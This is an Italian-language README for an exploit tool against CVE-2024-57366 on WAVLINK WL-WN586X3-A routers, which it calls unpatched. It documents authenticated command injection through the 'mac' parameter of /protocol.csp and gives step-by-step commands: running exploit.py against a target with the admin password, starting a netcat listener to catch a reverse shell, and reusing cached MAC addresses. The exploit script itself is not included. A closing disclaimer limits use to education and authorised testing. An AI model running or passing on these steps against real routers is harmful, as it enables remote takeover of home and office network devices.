
Exploit sviluppato per CVE-2024-57366 su router WAVLINK WL-WN586X3-A (NON PATCHATO ALLA DATA DI QUESTA VERSIONE!)
Un exploit robusto per CVE-2024-57366 che consente l'esecuzione remota di codice su router vulnerabili attraverso il bypass della convalida dell'indirizzo MAC e l'iniezione di comandi.
Questo è un exploit post-autenticazione che richiede che la funzione "Controllo remoto" del router sia attiva e la password amministrativa. Il nome utente amministrativo è hardcodato come "admin".
sudo (richiesto per la gestione dell'interfaccia di rete)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Lo script chiederà: "Use cached MAC for quick exploit? (y/n):" - rispondi "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - Indirizzo IP del router target (default: 127.0.0.1)--port - Porta del router target (default: 80)--local-ip - Il tuo indirizzo IP locale per il callback della reverse shell--local-port - Porta locale per il callback della reverse shell (default: 4444)--password - Password amministrativa del router--ssid - Nome della rete WiFi (default: WAVLINK-Mesh_DC4B)--force-full - Forza l'exploit completo, salta il controllo del MAC in cache--list-cached - Elenca gli indirizzi MAC in cache ed esciCVE-2024-57366 sfrutta un bypass della convalida dell'indirizzo MAC nel firmware del router. La vulnerabilità consente l'iniezione di comandi attraverso il parametro mac nell'endpoint /protocol.csp.
eth0 per preservare il contesto di rete originaleindex=1, token nel percorso URL)L'exploit memorizza automaticamente nella cache gli indirizzi MAC riusciti in successful_macs.txt:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
Aggiunta Manuale di MAC: Modifica successful_macs.txt e aggiungi righe come:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Avvia il listener netcat
nc -lvp 4444
# Esegui l'exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Quando viene chiesto di salvare l'indirizzo MAC, rispondi "y"
# Avvia il listener netcat
nc -lvp 4444
# Esegui l'exploit (utilizzerà il MAC in cache)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Rispondi "y" quando viene chiesto se utilizzare il MAC in cache
"No wireless adapters found"
sudo"MAC address validation failed"
"Request timed out"
"Reverse shell not connecting"
--local-ip sia corretto (usa ip addr show eth0)CVE-2024-57366/
├── exploit.py # Script principale dell'exploit
├── successful_macs.txt # Cache degli indirizzi MAC (generato automaticamente)
└── README.md # Questo file
Questo strumento è destinato esclusivamente a scopi educativi e di test autorizzati. Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicito permesso di testare. Gli autori non sono responsabili per qualsiasi uso improprio di questo strumento.
/protocol.cspQuesto progetto è fornito così com'è per scopi educativi. Utilizzalo in modo responsabile e in conformità con le leggi e i regolamenti applicabili.